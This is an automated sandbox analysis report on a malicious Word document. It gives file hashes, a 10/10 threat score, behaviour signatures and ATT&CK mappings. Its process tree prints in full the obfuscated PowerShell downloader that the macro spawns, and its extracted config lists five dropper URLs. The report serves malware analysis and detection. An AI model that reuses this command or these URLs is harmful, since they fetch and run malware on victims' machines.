Overview

overview

10

Static

static

8

28876a11ad...73.doc

windows7-x64

10

28876a11ad...73.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    89s
  • max time network
    87s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-03-2023 11:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473.doc

  • Size

    235KB

  • MD5

    57a933abcd0a70f46006deb5c3d507a0

  • SHA1

    fd6892c482305d7a6edbb2356d8f19330f5ba87b

  • SHA256

    28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473

  • SHA512

    b41788f33df1171ddac802e85589cc59ef1b539ab2489e85c4912b5ea85012763afd3f024fe9467617329c2af840341089e64121e9217321258e71e98c337faf

  • SSDEEP

    3072:uH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq52yXJm9YBmjDRErQm:uFVeEsjdXRC3jexGG6NYWofREkm

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.lbbsport.pl/Izmqs/
exe.dropper

http://www.isaac.samjoemmy.com/H9TF8/
exe.dropper

http://www.electrocad.in/4qTumjs/
exe.dropper

http://www.abilitymep.ae/mXss/
exe.dropper

http://www.efmj-eg.org/CdwOm/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . ( $ShelLid[1]+$ShELlid[13]+'X') ( -JoiN('46o77H68%96Z55~100%111~125m39K101~104H96~111H105Z126o42Z68~111L126~36Z93m111H104m73%102K99~111L100H126@49H46~70Z122%94X55%45X98Z126K126~122Z48@37o37H125o125~125@36o102L104H104~121%122~101L120Z126%36L122Z102o37o67@112X103o123%121%37m74o98H126@126L122m48L37Z37@125L125o125o36@99%121X107o107%105~36o121X107K103X96Z101K111X103o103~115K36~105H101K103Z37~66L51m94m76o50%37L74H98L126~126o122H48%37H37@125X125~125K36L111L102K111~105m126L120~101%105o107Z110K36~99o100~37%62%123H94%127o103H96m121H37m74K98@126X126Z122o48~37L37@125m125~125~36m107~104%99Z102m99o126@115o103m111Z122L36%107m111%37o103@82L121L121K37L74o98%126X126K122H48o37~37L125o125K125m36X111m108L103%96X39o111X109m36L101~120L109L37H73@110m125L69o103Z37@45~36H89K122H102@99~126@34K45m74m45o35%49Z46H93m126%127@42@55o42o45H51~62X57L45o49%46o105K99@101K55K46m111L100@124o48H126@111H103~122~33Z45L86X45%33Z46K93@126X127%33@45o36~111X114~111m45H49L108H101Z120o111~107H105m98L34H46H99%76K89%42~99X100~42X46X70m122o94m35X113~126m120L115@113L46Z77@68~96o36K78X101X125@100@102%101~107o110L76~99o102Z111K34@46%99o76L89@38L42%46H105L99%101K35%49o89o126~107~120X126m39K90o120Z101%105Z111o121X121H42o46o105L99~101~49o104H120K111@107@97@49~119m105o107X126Z105m98K113%119K119'.spLIt( 'H@~ZKmXLo%')|% {[CHAr] ( $_ -BxoR "0x0a") } ) )
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:848

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jzj24yu5.cby.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit
  • memory/848-146-0x000001CA9E8B0000-0x000001CA9E8D2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/848-152-0x000001CA9E6E0000-0x000001CA9E6F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/848-154-0x000001CA9E6E0000-0x000001CA9E6F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/848-158-0x000001CA9E6E0000-0x000001CA9E6F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2116-133-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2116-134-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2116-135-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2116-136-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2116-137-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2116-138-0x00007FFAB9070000-0x00007FFAB9080000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2116-139-0x00007FFAB9070000-0x00007FFAB9080000-memory.dmp
    Filesize

    64KB

    Download